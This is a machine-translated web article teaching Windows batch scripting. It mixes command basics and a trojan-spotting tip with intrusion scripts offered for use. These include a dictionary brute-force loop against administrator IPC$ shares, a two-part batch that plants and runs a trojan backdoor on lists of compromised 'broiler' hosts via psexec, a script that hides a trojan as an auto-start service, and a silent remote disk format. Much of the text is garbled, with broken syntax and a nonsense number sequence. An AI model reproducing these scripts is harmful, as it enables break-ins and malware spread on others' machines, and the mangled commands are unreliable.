In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/03 Report--
This article mainly shows you "what are the advanced application skills of batch processing". The content is easy to understand and clear, hoping to help you solve your doubts. Let me lead you to study and learn the article "what are the advanced application skills of batch processing".
Advanced use of batch processing 1
one。 Simple batch internal commands
Advanced use of batch processing! A little trick!
Batch processing is familiar to everyone!
Here are a few knowledge points about batch processing:
1: skillfully use the FC command to check Trojans:
First create the batch file atm.bat: write code: @ echo off
Dir c:\ windows\ system32\ * .exe > c:??.txt
Dir c:\ windows\ system32\ * .dll > c:??.txt
2: create batch file WLTS.bat write code: @ echo off
Dir c:\ windows\ system32\ * .dll > c:\ findexe.txt
Dir c:\ windows\ system32\ * .exe > c:\ finddll.txt
Fc c:??.txt c:\ findexe.txt > c:\ exe.txt
Fc c:??.txt c:\ finddll.txt > c:\ dll.txt
So run ATM.BAT on your machine first.
In the future, when you suspect a Trojan horse, run WLTS.BAT and then take a look at C:\ EXE.TXT and DLL.TXT to see the suspicious file! This is just a train of thought! You can also use him to know the junk files left when you uninstall the software! Like in the registry!
2: use the SUBST command to make a hard drive!
Example
Subst x: c:??
Where X is the drive letter 111 is the folder where the drive is created
3: skillfully use the SUBST command to hide 3.5 drives
Subst h: C:\ atm and make the ATM folder read-only!
Restore: at start-run-subst a: / d!
1.Echo command
Turn on or off the request echo feature, or display messages. If there are no parameters, the echo command displays the current echo settings.
Grammar
Echo [{on | off}] [message]
Sample:@echo off / echo hello world
In practical application, we will combine this command with redirection symbols (also known as pipe symbols, usually use > > ^) to input some commands into files of a specific format. This will be reflected in future examples.
2.@ command
Indicates that the commands after @ are not displayed, so during the invasion (such as using batch processing to format the enemy's hard drive), you will not be able to let the other party see the commands you are using.
Sample:@echo off
@ echo Now initializing the program,please wait a minite...
@ format X: / q/u/autoset (the / y parameter is not allowed in the format command, but the good news is that Microsoft left an autoset parameter for us, and the effect is the same as / y.)
3.Goto command
Specify to jump to the label, and when the tag is found, the program will process the command that starts on the next line.
Syntax: goto label (label is a parameter that specifies the lines in the batch program to be directed to. )
Sample:
If {% 1} = = {} goto noparms
If {% 2} = {} goto noparms (if you don't understand the if,% 1,% 2 here, skip it first, and there will be a detailed explanation later. )
@ Rem check parameters if null show usage
: noparms
Echo Usage: monitor.bat ServerIP PortNumber
Goto end
The name of the tag can be chosen at will, but it is better to have a meaningful letter, preceded by a letter: to indicate that the letter is a label, and the goto command is based on this: to find the next step to jump there. You'd better have some instructions so that you and others will seem to understand your intentions.
4.Rem command
The comment command, which is equivalent to / *-/ in the C language, is not executed, but acts as a comment for others to read and you to modify later.
Rem Message
Sample:@Rem Here is the description.
5.Pause command
When you run the Pause command, the following message is displayed:
Press any key to continue. . .
Sample:
@ echo off
: begin
Copy aRom back. * d:\
Echo Please put a new disk into driver A
Pause
Goto begin
In this example, all files on disk in drive An are copied to d:\ back. When the comment that appears prompts you to put another disk in drive A, the pause command suspends the program so that you can replace the disk and press any key to continue processing.
6.Call command
Calls from one batch program to another without terminating the parent batch program. The call command accepts the label that is used as the target of the call. If you use Call outside of a script or batch file, it will not work on the command line.
Grammar
Call [[Drive:] [Path] FileName [BatchParameters]] [: label [arguments]]
Parameters.
[Drive:} [Path] FileName
Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.
7.start command
Call external programs, all DOS commands and command-line programs can be called by the start command.
Common parameters of intrusion:
Window minimization at the beginning of MIN
SEPARATE starts a 16-bit Windows program in a separate space
HIGH starts the application in the HIGH priority category
REALTIME starts the application in the REALTIME priority category
WAIT starts the application and waits for it to finish
Parameters these are the parameters passed to the command / program
When the executing application is a 32-bit GUI application, CMD.EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.
8.choice command
Choice uses this command to allow the user to enter a character to run different commands. The / c: parameter should be added when in use, and the characters that can be prompted for input should be written after c:, with no space between them. Its return code is 1234...
Such as: choice / cme defrag,mem,end
Will be displayed
Defrag,mem,end [D,M,E]?
Sample:
The Sample.bat is as follows:
@ echo off
Choice / cme defrag,mem,end
If errorlevel 3 goto defrag (the error code with the highest value should be judged first)
If errorlevel 2 goto mem
If errotlevel 1 goto end
Efrag
C:\ dos\ defrag
Goto end
: mem
Mem
Goto end
: end
Echo good bye
After this file is run, it will display defrag,mem,end [DJI MJE]? The user can select d me, and then the if statement will make a judgment. D means to execute the program segment labeled defrag, m means to execute the program segment labeled mem, e means to execute the program segment labeled end, and each program segment finally jumps the program to the end label with goto end, and then the program will display good bye and the file will end.
Advanced use of batch processing 2
three。 How to use combined commands (Compound Command)
1. &
Usage: first command & second command [& third command.]
In this way, multiple commands can be executed at the same time, regardless of whether the command is successful or not
Sample:
C:\ > dir z: & dir c:\ Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\ Ex4rch
2002 05 14 23:51
2002-05-14 23:51.
2002-05-14 23:51 14 sometips.gif
2. Please &
Usage: first command & & second command [& & third command.]
In this way, multiple commands can be executed at the same time. When there is an error in the execution of the command, the subsequent command will not be executed, and all the commands will be executed all the time if there has been no error.
Sample:
C:\ > dir z: & & dir c:\ Ex4rch
The system cannot find the path specified.
C:\ > dir c:\ Ex4rch & & dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\ Ex4rch
2002 05 14 23:55
2002-05-14 23:55.
2002-05-14 23:55 14 sometips.gif
1 File (s) 14 bytes
2 Dir (s) 768671744 bytes free
The system cannot find the path specified.
It may be easier to use this command when making a backup, such as:
Dir file://192.168.0.1/database/backup.mdb & & copy file://192.168.0.1/database/backup.mdb E:\ backup
If the backup.mdb file exists on the remote server, the copy command is executed, and if the file does not exist, the copy command is not executed. This usage can replace IF exist:) 3. | |
Usage: first command | | second command [| | third command.]
In this way, multiple commands can be executed at the same time. When the correct command is executed, the subsequent command will not be executed, and if no correct command appears, all the commands will be executed all the time.
Sample:
C:\ Ex4rch > dir sometips.gif | | del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\ Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File (s) 14 bytes
0 Dir (s) 768696320 bytes free
Examples of the use of combined commands:
Sample:
@ copy trojan.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PASS 3 > > victim.txt
No.4
Fourth, the use of pipeline commands
1. | Command
Usage: first command | second command [| third command.]
Use the result of the first command as an argument to the second command, which is common in unix.
Sample:
Time / t > > D:\ IP.log
Netstat-n-p tcp | find ": 3389" > > D:\ IP.log
Start Explorer
Can you see that? Terminal Services allows us to customize the starting program for the user to run the following bat to get the IP of the logged-in user.
2. > output redirect command
The difference between redirecting a command or the output of a program to a specific file is that > clears the contents of the original file and writes to the specified file, while > > only appends the contents to the specified file. without changing the contents.
Sample1:
Echo hello world > c:\ hello.txt (stupid example?)
Sample2:
Nowadays, DLL Trojans are very popular. We know that system32 is a good place to play hide-and-seek. Many Trojans have sharpened their heads to drill there, and DLL horses are no exception. We can make a record of the EXE and DLL files in this directory after installing the system and necessary applications:
Run CMD-- to convert the directory to system32--dir * .exe > exeback.txt & dir * .dll > dllback.txt
So that the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt, respectively.
In the future, if an anomaly is found but the problem cannot be found by the traditional method, it is necessary to consider whether the DLL Trojan has been sneaked into the system.
Then we use the same command to record the EXE and DLL files under system32 to other exeback1.txt and dllback1.txt, and then run:
CMD--fc exeback.txt exeback1.txt > diff.txt & fc dllback.txt dllback1.txt > diff.txt. (use the FC command to compare the DLL and EXE files before and after two times, and enter the results into diff.txt), so that we can find some extra DLL and EXE files, and then by looking at the creation time, version, whether it has been compressed, etc., we can easily determine whether it has been patronized by the DLL Trojan. No is the best, if there is, do not directly DEL off, first use regsvr32 / u trojan.dll to cancel the backdoor DLL file, and then move it to the Recycle Bin, if there is no abnormal reflection of the system, then delete it completely or submit it to the antivirus software company.
3.
< 、>&, & writes the output of one handle to the input of another.
> Sample.reg
@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > Sample.reg
@ echo "Invader" = "Ex4rch" > > Sample.reg
Echo "door" = 5 > > C:\\ WINNT\\ system32\\ door.exe > > Sample.reg
@ echo "Autodos" = dword:02 > > Sample.reg
Samlpe2:
When we use some older Trojans, we may generate a key under [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run (Runonce, Runservices, Runexec)] in the registry to realize the self-startup of Trojans. However, it is easy to expose the path of the Trojan program, resulting in the Trojan being checked and killed. relatively, it is relatively safe to register the Trojan program as a system service. Take the configured IRC Trojan DSNX as an example (named windrv32.exe)
@ start windrv32.exe
@ attrib + h + r windrv32.exe
@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > patch.dll
@ echo "windsnx" =-> > patch.dll
@ sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\ winnt\ system32\ windrv32.exe
@ regedit / s patch.dll
@ delete patch.dll
REM [delete the startup key of DSNXDE in the registry, register it as a system critical service with sc.exe and set its properties to hidden and read-only, and config to self-startup]
@ REM, this is not safer ^ _ ^.
Some good skills! (it can be called a classic)
1. If you have multiple windows open at the same time and want to close, hold down shift and click the close icon in the upper right corner of the window.
two。 Before saving the web page, you can press the "ESC" key (or work offline) and save it again, so that you can save it quickly.
3. Listen to CD on the computer without any playback software, connect the speaker cable directly to the headphone hole of the CD-ROM drive, put it into the CD, and press the play key on the CD-ROM drive to listen directly, so that listening to music does not take up system resources. If your computer is broken and cannot be started or something, it can't be repaired for a while. Don't waste resources. If you use the power supply inside to power up the CD drive, you can temporarily make a CD player.
Press enter when sending messages in 4.MSN. If you want to change lines but do not want to send messages, you can shift+enter or ctrl+enter
5. Short HTML code can be debugged in the browser's address bar. The method is as follows: write about: abc enter in the address bar, and you will see the effect.
6.Windows shortcut key:
Win+m display Desktop
Win+pause system Properties
Quick restart: press shift before pressing OK (not applicable to 2k, xp).
Completely delete hift+del
Do not let the CD run automatically: press shift
Ctrl+Esc: equivalent to "start" or win key
Ctrl+Home: move the cursor to the beginning of the text editing area (Home only: move to the beginning of the column)
Ctrl+End: move the cursor to the end of the text editing area (End: move to the end of the column)
Alt+F4: close the current window (shutdown if you click on the desktop and then press it)
F2: change the name
Windows+e Explorer.
Windows+r runs.
Windows+f search.
Windows+u shuts down the system.
Windows+d minimizes all windows, press Win+D again to return to the window before minimization.
Windows+m minimizes all windows, but pressing again cannot return to the window before minimization.
Shift+F10, you can open the right-click menu of the selected project.
CTRL+SHIFT-drag file: create a shortcut.
7. Shortcut to shutdown
(1)。 Press the right mouse button in the blank position of the desktop->-> Select
(2)。 Before typing rundll.exe user.exe,exitwindows
(3)。 Before typing or the name you want-> press
8. Restart the shortcut
(1)。 Repeat above (1)
(2)。 Before typing rundll.exe user.exe,exitwindow***ec
(3)。 Before typing or the name you want-> press
< 完成>9.RUN-> cmd or command
You will see the DOS window. I don't know if you've noticed that little icon, it's in the upper left corner.
Click on this icon, you will see the drop-down menu, especially some functions under Edit, which is very convenient.
10.con and nul are reserved names of MS systems, and they cannot be used as file names! Check whether your web space is an M$ system, and try to create a con folder.
11. Want to make a list of files in one of your folders? What software do you use? No, type "tree / f > index.txt" directly at the command line. Open index.txt to see if it is clear at a glance.
twelve。 To save the borderless window page, please use CTRL+N to open a new window
Advanced use of batch processing 3
9.If command
If said it would determine whether the specified conditions were met and then decide to execute different orders. There are three formats:
1. If "parameter" = = "string" command to be executed
If the parameter is equal to the specified string, the condition holds, run the command, otherwise run the next sentence. (note that there are two equal signs)
For example, if "% 1" = "a" format a:
If {% 1} = = {} goto noparms
If {% 2} = = {} goto noparms
2. If exist file name command to be executed
If there is a specified file, the condition is established, run the command, otherwise run the next sentence.
Such as if exist config.sys edit config.sys
3. If errorlevel / if not errorlevel digital commands to be executed
If the return code is equal to the specified number, the condition holds, run the command, otherwise run the next sentence.
Such as if errorlevel 2 goto x2
When the DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code. The common return codes are 0,1. 10.for command
The for command is a complex command, which is mainly used for parameters to cycle through the command within a specified range.
Use% variable to specify variables when using the FOR command in a batch file
For {% variable |% variable} in (set) do command [CommandLineOptions]
% variable specifies a parameter that can be replaced by a single letter.
(set) specify a file or group of files. You can use wildcards.
Command specifies the commands to be executed on each file.
Command-parameters specifies parameters or command line switches for specific commands.
Use% variable to specify variables when using the FOR command in a batch file
Instead of using% variable. Variable names are case-sensitive, so% I is different from% I
If the command extension is enabled, the following additional FOR command formats are subject to
Support:
FOR / D% variable IN (set) DO command [command-parameters]
If the set contains wildcards, specify to match the directory name, not the file
The first name matches.
FOR / R [[drive:] path]% variable IN (set) DO command [command-
Check the directory tree rooted in [drive:] path and point to the
FOR statement. If no directory is specified after / R, the current
Catalogue. If the set is only a single point (.) Character, the directory tree is enumerated.
FOR / L% variable IN (start,step,end) DO command [command-para
This set represents a sequence of numbers from beginning to end in increments.
Therefore, the sequence 1, 2, 3, 4, 5, 1, 2, 3, 4, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 5, 1, 4, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 1, 4,
Sequence (5-4-3-21).
FOR / F ["options"]% variable IN (file-set) DO command
FOR / F ["options"]% variable IN ("string") DO command
FOR / F ["options"]% variable IN (command) DO command
Or, if you have the usebackq option:
FOR / F ["options"]% variable IN (file-set) DO command
FOR / F ["options"]% variable IN ("string") DO command
FOR / F ["options"]% variable IN (command) DO command
Filenameset is one or more file names. Continue to the filenameset
Before the next file, each file has been opened, read, and processed.
Processing involves reading the file, dividing it into lines of text, and then dividing each line
Parse to zero or more symbols. Then use the value of the symbol string variable found
Call the For loop. By default, / F is separated by each line of each file
The first blank symbol of the Skip the blank line. You can specify the optional "options"
Parameter instead of the default parsing *. This quoted string consists of one or more
Specify keywords for different parsing options. These keywords are:
Eol=c-refers to the end of a line comment character (just one)
Skip=n-refers to the number of lines ignored at the beginning of the file.
Delims=xxx-refers to the delimiter set. This replaces spaces and tabs
Default delimiter set.
Tokens=x,y,m-n-refers to which symbol of each line is passed to each iteration
The for itself. This results in an additional variable name
The format is a range. Specify m by nth symbol
The last character in a symbol string, an asterisk.
Then the extra variable will be parsed in the last symbol.
Assign and accept reserved text for lines.
Usebackq-specifies that the new syntax has been used in the following class cases:
A string in quotation marks is executed as a command and
The quotation mark character is a text string command and is allowed in fi
Use double quotation marks to expand the file name in.
Sample1:
FOR / F "eol=; tokens=2,3* delims=," I in (myfile.txt) do command
Parses every line in the myfile.txt, ignores those that start with a semicolon, and sets the
The second and third symbols in each line are passed to the body of the for program; use commas and / or
Space delimiting symbol. Note that the statement in the body of this for program refers to% I
Get the second symbol, reference% j to get the third symbol, reference% k
To get all the remaining symbols after the third symbol. For files with spaces
Name, you need to enclose the file name in double quotes. In order to make in this way
With double quotes, you also need to use the usebackq option, otherwise, double quotes will
Is understood to be used to define a string to parse.
% I is specified specifically in the for statement,% j and% k are specified through the
The tokens= option is specifically explained. You can go through the tokens= line
Specify a maximum of 26 symbols, as long as you do not attempt to indicate a higher than the letter z or
The variable of Z. Remember, FOR variables are single-letter, case-sensitive, and global
At the same time, there cannot be more than 52 in use.
You can also use FOR / F parsing logic on adjacent strings by
Enclose the filenameset between parentheses in single quotation marks. This way, the character
The string is treated as a single input line in a file.
Finally, you can analyze the output of the command with the FOR / F command. The way is to set the
The filenameset between the parentheses becomes an anti-parenthesis string. The string will
Is treated as a command line, passed to a child CMD.EXE, and its output is caught in the
Memory and is analyzed as a file. Therefore, the following examples:
FOR / F "usebackq delims=="% I IN (`set`) DO @ echo% I
Enumerates the environment variable names in the current environment.
In addition, the replacement of FOR variable references has been enhanced. You can now use the following
Option syntax:
~ I-remove any quotation marks ("), expand% I
% ~ fI-extends% I to a fully qualified pathname
% ~ dI-expand% I to only one drive letter
% ~ pI-extends% I to only one path
% ~ nI-extends% I to only one file name
% ~ xI-extends% I to only one file extension
% ~ sI-the extended path contains only short names
% ~ aI-extends% I to the file attributes of the file
% ~ tI-extends% I to the date / time of the file
% ~ zI-extends% I to the size of the file
% ~ $PATH:I-find the directory listed in the path environment variable and extend% I
To the first fully qualified name found. If the environment variable
If the file is not defined or the file is not found, this key combination expands
Empty string
You can combine modifiers to get multiple results:
% ~ dpI-extends% I to only one drive letter and path
% ~ nxI-extends% I only to a file name and extension
% ~ fsI-only extends% I to a full pathname with a short name
% ~ dp$PATH:i-find the directory listed in the path environment variable and extend% I
To the first drive letter and path found.
% ~ ftzaI-extends% I to DIR with similar output lines
In the above example,% I and PATH can be replaced with other valid values. % ~ Grammar
Terminate with a valid FOR variable name. Select an uppercase variable name similar to% I
It is easier to read and avoid confusion with key combinations regardless of case.
The above is the official help of MS. Let's give a few examples to illustrate the use of the For command in an intrusion.
Sample2:
Use the For command to crack the brute force password of a target Win2k host.
We use net use\ ip\ ipc$ "password" / u: "administrator" to try to connect to the target host, and write down the password when successful.
The main command is one: for / fi% in (dict.txt) do net use\\ ip\ ipc$ "I%" / u: "administrator"
The password of admin is represented by I%. In dict.txt, the value of I% is connected with the net use command. Then pass the running result of the program to the find command--
For / fi%% in (dict.txt) do net use\\ ip\ ipc$ "I%%" / u: "administrator" | find ": command completed successfully" > > D:\ ok.txt, so ko.
Sample3:
Have you ever had a lot of broilers waiting for you to plant backdoor + Trojans? When the number is very large, the originally very happy thing will become very depressed. The article begins with the use of batch files, which can simplify day-to-day or repetitive tasks. So how to achieve it? Ha ha, you will understand if you look at it.
There is only one main command: (when using the FOR command in a batch file, the specified variable uses% variable)
@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call door.bat I j k
For the use of tokens, see sample1 above, where it means that the contents of victim.txt are passed sequentially to the parameter% I% j% k in door.bat.
And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy Trojan + backdoor to victim, and then use the return code (If errorlever =) to screen the host that has successfully planted the backdoor, and echo it out, or echo to the specified file.
Delims= indicates that the content in the vivtim.txt is separated by a space. I want to see here, you must also understand what the content of this victim.txt is like. It should be arranged according to the objects represented by% I% j% k, which is usually ip password username.
Prototype code:
-cut here then save as a batchfile (I call it main.bat)-
@ echo off
@ if "% 1" = "" goto usage
@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call IPChack.bat I j k
@ goto end
: usage
@ echo run this batch in dos modle.or just double-click it.
: end
-cut here then save as a batchfile (I call it main.bat)-
-cut here then save as a batchfile (I call it door.bat)-
@ net use\% 1\ ipc$% 3 / u: "% 2"
@ if errorlevel 1 goto failed
@ echo Trying to establish the IPC$ connection. OK
@ copy windrv32.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PWD 3 > > ko.txt
@ psexec\% 1 c:\ winnt\ system32\ windrv32.exe
@ psexec\ 1 net start windrv32 & & if not errorlevel 1 echo 1 Backdoored > > ko.txt
: failed
@ echo Sorry can not connected to the victim.
-cut here then save as a batchfile (I call it door.bat)-
This is just a prototype of automatic backdoor batch processing, two batches and backdoor programs (Windrv32.exe), PSexec.exe needs to be placed in a unified directory. Batch processing content
It can also be extended, such as adding the function of clearing log + DDOS, adding the function of adding users regularly, and going deeper to make it have the function of automatic propagation (worm). There is no more description here. Interested friends can study it on their own.
-
2:No.2
two。 How to use parameters in batch files
Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, you need to use shift to move them. This is rare, so we will not consider it.
Sample1:fomat.bat
@ echo off
If "% 1" = = "a" format a:
: format
@ format a:/q/u/auotset
@ echo please insert another disk to driver A.
@ pause
@ goto fomat
This example is used to format several floppy disks continuously, so when you use it, you need to type fomat.bat an in the dos window. Hehe, it seems to be a little superfluous.
Sample2:
When we want to set up an IPC$ connection, we always have to enter a long list of commands, which may lead to a wrong number, so we might as well write some fixed commands into a batch and assign the broiler ip password username as parameters to the batch, so that we don't have to type commands every time.
@ echo off
@ net use\ percent\ ipc$ "2%" / u: "3%" Note, here PASSWORD is the second parameter.
@ if errorlevel 1 echo connection failed
The above is all the contents of this article entitled "what are the Advanced skills of batch processing?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.